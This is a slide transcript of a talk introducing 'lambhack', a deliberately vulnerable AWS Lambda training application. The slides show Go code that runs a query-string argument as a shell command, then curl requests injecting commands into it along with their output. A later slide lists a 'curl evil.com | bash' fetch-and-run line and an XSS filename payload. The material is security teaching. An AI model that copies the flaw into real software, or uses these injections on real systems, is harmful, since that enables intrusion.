LambHack: A Vulnerable Serverless Application
2 likes•595 views
The document discusses the importance of application security in the context of serverless architectures, highlighting the vulnerabilities associated with serverless applications like AWS Lambda. It introduces 'lambhack', a vulnerable serverless application designed to demonstrate these issues, such as command execution vulnerabilities and attack vectors like XSS and injection attacks. The author calls for community contributions to enhance the project, emphasizing that while serverless technology simplifies development, it also introduces new security challenges that are reminiscent of traditional app security problems.
![CLOUD AUSTIN @WICKETT
WHY IS THIS BAD?
command := lambdaEvent.QueryParams[“args"]
output := runner.Run(command)](https://image.slidesharecdn.com/lambhack-dec2017-171220003306/85/LambHack-A-Vulnerable-Serverless-Application-22-320.jpg)
LambHack: A Vulnerable Serverless Application
- 1. CLOUD AUSTIN @WICKETT LAMBHACK: A VULNERABLE SERVERLESS APPLICATION JAMES WICKETT
- 2. CLOUD AUSTIN @WICKETT Development of highly-resilient, distributed systems is now easier than ever with serverless, however application security is more important than ever before. WHY IT MATTERS
- 3. CLOUD AUSTIN @WICKETT ‣ HEAD OF RESEARCH AT SIGNAL SCIENCES ‣ DEVOPS DAYS AUSTIN ORGANIZER ‣ AUTHOR DEVOPS FUNDAMENTALS AT LYNDA.COM ‣ BLOGGER AT THEAGILEADMIN.COM AND LABS.SIGNALSCIENCES.COM JAMES WICKETT
- 4. CLOUD AUSTIN @WICKETT Serverless encourages functions as deploy units and run as one-time*, read-only containers*, coupled with third party services that allow running end-to-end applications without worrying about system operation. SERVERLESS DEFINITION * - there is container reuse and writability
- 5. CLOUD AUSTIN @WICKETT VMsHardware Serverless Inspiration from @adrianco Waste Value
- 8. CLOUD AUSTIN @WICKETT CI/CD auth wordpress scraper event ingestion chatbots load testing MORE SERVERLESS USE CASES
- 10. CLOUD AUSTIN @WICKETT ‣ SECURE SOFTWARE SUPPLY CHAIN ‣ DELIVERY PIPELINE ‣ DATA FLOW SECURITY ‣ ATTACK DETECTION FOUR AREAS OF SERVERLESS SECURITY
- 13. CLOUD AUSTIN @WICKETT INSPIRED BY WEB GOAT AND ALL THE OTHER GOATS…
- 15. CLOUD AUSTIN @WICKETT ‣ SERVERLESS HAS A FALSE SENSE OF SECURITY ‣ API PROXY LAYER THING PROTECTS ME, RIGHT? ;) ‣ WANTED TO SEE MAKE THE POINT THAT APPSEC IS RELEVANT IN SERVERLESS ‣ A VULNERABLE LAMBDA + API GATEWAY STACK ‣ BORN FROM THE HERITAGE OF WEBGOAT, RAILS GOAT, GRUYERE, AND OTHERS… INTRODUCING LAMBHACK
- 16. CLOUD AUSTIN @WICKETT ‣ A VULNERABLE LAMBDA + API GATEWAY STACK ‣ OPEN SOURCE, MIT LICENSED ‣ INCLUDES ARBITRARY CODE EXECUTION IN A QUERY STRING ‣ MORE WORK NEEDED, PULL REQUESTS ACCEPTED AND LOOKING FOR COMMUNITY HELP ‣ GITHUB.COM/WICKETT/LAMBHACK github.com/wickett/lamback
- 18. CLOUD AUSTIN @WICKETT ‣ GOLANG! ‣ AWS LAMBDA SUPPORTS BRING YOUR OWN BINARY ‣ SPARTA WRAPS YOUR COMPILED BINARY WITH A NODE.JS SHIM ‣ GO SPARTA ALSO HANDLES ALL THE OTHER AWS SERVICES YOUR APP CONSUMES GO SPARTA
- 19. CLOUD AUSTIN @WICKETT ‣ CLOUDWATCH EVENTS AND LOGS ‣ DYNAMODB, KINESIS, ‣ S3 ‣ SES, SNS ‣ API GATEWAY CREATION GO SPARTA INCLUDES
- 20. CLOUD AUSTIN @WICKETT lambhack is a vulnerable serverless lambda application It would certainly be a bad idea to base any coding patterns off what you see here.
- 22. CLOUD AUSTIN @WICKETT WHY IS THIS BAD? command := lambdaEvent.QueryParams[“args"] output := runner.Run(command)
- 23. CLOUD AUSTIN @WICKETT With command execution available to us in lambhack, we can poke around the container a bit
- 24. CLOUD AUSTIN @WICKETT UNAME -A $ curl “https://XXXX.execute-api.us- east-1.amazonaws.com/prod/lambhack/c?args=uname+-a; +sleep+1" > Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
- 25. CLOUD AUSTIN @WICKETT CAT /PROC/VERSION $ curl “https://XXXX.execute-api.us- east-1.amazonaws.com/prod/lambhack/c?args=cat+/proc/ version;+sleep+1” > Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi-build-60006) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Tue Dec 6 20:30:04 UTC 2016
- 26. CLOUD AUSTIN @WICKETT LET’S LOOK IN /TMP $ curl “https://XXXX.execute-api.us- east-1.amazonaws.com/prod/lambhack/c?args=ls+-la+/tmp; +sleep+1" total 17916 drwx------ 2 sbx_user1056 490 4096 Feb 8 22:02 . drwxr-xr-x 21 root root 4096 Feb 8 21:47 .. -rwxrwxr-x 1 sbx_user1056 490 18334049 Feb 8 22:02 Sparta.lambda.amd64
- 27. CLOUD AUSTIN @WICKETT LAMBDA REUSE IN ACTION! $ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/ prod/lambhack/c?args=ls+/tmp;+sleep+1" $ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/ prod/lambhack/c?args=touch+/tmp/wickettfile;+sleep+1” $ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/ prod/lambhack/args=ls+/tmp;+sleep+1" > Sparta.lambda.amd64 wickettfile
- 28. CLOUD AUSTIN @WICKETT WHICH CURL $ curl “https://XXXX.execute-api.us- east-1.amazonaws.com/prod/lambhack/c? args=which+curl;+sleep+1" > /usr/bin/curl
- 29. CLOUD AUSTIN @WICKETT GOT PROXY? $ curl “https://XXXX.execute-api.us- east-1.amazonaws.com/prod/lambhack/c? args=curl+https://www.example.com; +sleep+1" > "<!doctype html>n<html>n<head>n <title>Example Domain</title>nn <meta charset="utf-8" />n <meta http-equiv="Content-type" content="text/html; charset=utf-8" />n <meta name="viewport" content="width=device-width, initial-scale=1" />n <style type="text/ css">n body {n background-color: #f0f0f2;n margin: 0;n padding: 0;n font-family: "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;n n }n div {n width: 600px;n margin: 5em auto;n padding: 50px;n background-color: #fff;n border-radius: 1em;n }n a:link, a:visited {n color: #38488f;n text-decoration: none;n }n @media (max-width: 700px) {n body {n background-color: #fff;n }n div {n width: auto;n margin: 0 auto;n border-radius: 0;n padding: 1em;n }n }n </style> n</head>nn<body>n<div>n <h1>Example Domain</h1>n <p>This domain is established to be used for illustrative examples in documents. You may use thisn domain in examples without prior coordination or asking for permission.</p>n <p><a href="http://www.iana.org/domains/example">More information...</ a></p>n</div>n</body>n</html>n" bit.ly/lh-demo1
- 30. CLOUD AUSTIN @WICKETT ‣ HELP NEEDED ‣ ADD XSS AND OTHER ATTACKS ‣ ADD AUTH VECTORS AND EXAMPLES ‣ NEEDS A UI PLEASE! ‣ PULL REQUESTS ACCEPTED :) FUTURE OF LAMBHACK
- 31. CLOUD AUSTIN @WICKETT APPLICATION SECURITY IS STILL RELEVANT 15+ YEARS LATER
- 33. CLOUD AUSTIN @WICKETT ‣ New surface area, similar appsec problems ‣ Command Exec, XSS, Injection Attacks ‣ All the OWASP Top Ten ‣ What is old is new. ‣ Appending ‘curl evil.com | bash’ ‣ Add <script>alert(1)</script> to a filename you upload on s3 TYPES OF ATTACKS
- 34. CLOUD AUSTIN @WICKETT Development of highly-resilient, distributed systems is now easier than ever with serverless, however application security is more important than ever before. WHY IT MATTERS
- 35. CLOUD AUSTIN @WICKETT WANT THE SLIDES RIGHT NOW OR HAVE QUESTIONS? Send an email to [email protected]